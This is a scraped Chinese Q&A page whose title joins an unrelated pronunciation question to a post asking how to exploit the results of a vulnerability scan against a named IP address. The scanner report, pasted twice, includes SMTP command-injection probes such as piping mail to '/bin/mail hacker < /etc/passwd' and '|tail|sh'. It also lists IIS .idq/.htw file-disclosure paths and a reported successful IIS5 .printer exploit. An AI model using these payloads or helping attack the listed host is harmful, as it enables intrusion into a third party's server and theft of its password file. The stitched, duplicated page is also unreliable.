高校问答有机锗怎么读音:谁能来解释一下如下CGI/ASP漏洞?
来源:百度文库 编辑:高校问答 时间:2024/05/02 19:30:09
下面是我用X-WAY扫描这个IP后出现的历史报告,大家能否具体说明一下,我如何利用这些漏洞进行攻击?
WEB服务信息检测
服务检测 SMTP-> 220 server Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sat, 31 Dec 2005 11:26:59 +0800
服务检测 HTTP-> Microsoft-IIS/5.0
--------------------------------------------------------------------------------
FTP匿名检测
--------------------------------------------------------------------------------
SMTP检测
支持VRFY
检测 SMTP->219.154.236.87 250 server Hello [61.54.147.188]
检测 SMTP->219.154.236.87 检测debug漏洞 500 5.3.3 Unrecognized command
检测 SMTP->219.154.236.87 检测kill漏洞 500 5.3.3 Unrecognized command
检测 SMTP->219.154.236.87 检测wiz漏洞 500 5.3.3 Unrecognized command
检测 SMTP->219.154.236.87 检测rcpt to: /tmp/.rhosts漏洞 503 5.5.2 Need Mail From: first
检测 SMTP->219.154.236.87 检测+ +漏洞 500 5.3.3 Unrecognized command
检测 SMTP->219.154.236.87 检测RSET漏洞 250 2.0.0 Resetting
检测 SMTP->219.154.236.87 检测mail from: |/bin/mail hacker < /etc/passwd漏洞 501 5.5.4 Invalid arguments
检测 SMTP->219.154.236.87 检测RSET漏洞 250 2.0.0 Resetting
检测 SMTP->219.154.236.87 检测mail from: |tail|sh漏洞 250 2.1.0 |tail|sh@server....Sender OK
--------------------------------------------------------------------------------
FINGER检测
--------------------------------------------------------------------------------
RPC检测
--------------------------------------------------------------------------------
弱口令检测
--------------------------------------------------------------------------------
端口检测
25 [smtp]
80 [http]
443 [https]
--------------------------------------------------------------------------------
CGI/ASP漏洞
219.154.236.87/*.idq
219.154.236.87/*.ida
219.154.236.87/?wp-start-ver
219.154.236.87/?wp-stop-ver
219.154.236.87/?wp-uncheckout
219.154.236.87/?wp-usr-prop
219.154.236.87/?wp-ver-diff
219.154.236.87/?wp-html-rend
219.154.236.87/?wp-cs-dump
219.154.236.87/?wp-verify-link
219.154.236.87/?wp-ver-info
219.154.236.87/abczxv.htw
219.154.236.87/blabla.idq
219.154.236.87/?PageServices
219.154.236.87/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full
219.154.236.87/scripts/samples/search/author.idq
219.154.236.87/scripts/samples/search/filesize.idq
219.154.236.87/scripts/samples/search/filetime.idq
219.154.236.87/scripts/samples/search/qfullhit.htw
219.154.236.87/scripts/samples/search/query.idq
219.154.236.87/scripts/samples/search/queryhit.idq
219.154.236.87/scripts/samples/search/simple.idq
219.154.236.87/scripts/samples/search/qsumrhit.htw
IIS5.0 NULL.printer Exploit ...OK
WEB服务信息检测
服务检测 SMTP-> 220 server Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sat, 31 Dec 2005 11:26:59 +0800
服务检测 HTTP-> Microsoft-IIS/5.0
--------------------------------------------------------------------------------
FTP匿名检测
--------------------------------------------------------------------------------
SMTP检测
支持VRFY
检测 SMTP->219.154.236.87 250 server Hello [61.54.147.188]
检测 SMTP->219.154.236.87 检测debug漏洞 500 5.3.3 Unrecognized command
检测 SMTP->219.154.236.87 检测kill漏洞 500 5.3.3 Unrecognized command
检测 SMTP->219.154.236.87 检测wiz漏洞 500 5.3.3 Unrecognized command
检测 SMTP->219.154.236.87 检测rcpt to: /tmp/.rhosts漏洞 503 5.5.2 Need Mail From: first
检测 SMTP->219.154.236.87 检测+ +漏洞 500 5.3.3 Unrecognized command
检测 SMTP->219.154.236.87 检测RSET漏洞 250 2.0.0 Resetting
检测 SMTP->219.154.236.87 检测mail from: |/bin/mail hacker < /etc/passwd漏洞 501 5.5.4 Invalid arguments
检测 SMTP->219.154.236.87 检测RSET漏洞 250 2.0.0 Resetting
检测 SMTP->219.154.236.87 检测mail from: |tail|sh漏洞 250 2.1.0 |tail|sh@server....Sender OK
--------------------------------------------------------------------------------
FINGER检测
--------------------------------------------------------------------------------
RPC检测
--------------------------------------------------------------------------------
弱口令检测
--------------------------------------------------------------------------------
端口检测
25 [smtp]
80 [http]
443 [https]
--------------------------------------------------------------------------------
CGI/ASP漏洞
219.154.236.87/*.idq
219.154.236.87/*.ida
219.154.236.87/?wp-start-ver
219.154.236.87/?wp-stop-ver
219.154.236.87/?wp-uncheckout
219.154.236.87/?wp-usr-prop
219.154.236.87/?wp-ver-diff
219.154.236.87/?wp-html-rend
219.154.236.87/?wp-cs-dump
219.154.236.87/?wp-verify-link
219.154.236.87/?wp-ver-info
219.154.236.87/abczxv.htw
219.154.236.87/blabla.idq
219.154.236.87/?PageServices
219.154.236.87/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full
219.154.236.87/scripts/samples/search/author.idq
219.154.236.87/scripts/samples/search/filesize.idq
219.154.236.87/scripts/samples/search/filetime.idq
219.154.236.87/scripts/samples/search/qfullhit.htw
219.154.236.87/scripts/samples/search/query.idq
219.154.236.87/scripts/samples/search/queryhit.idq
219.154.236.87/scripts/samples/search/simple.idq
219.154.236.87/scripts/samples/search/qsumrhit.htw
IIS5.0 NULL.printer Exploit ...OK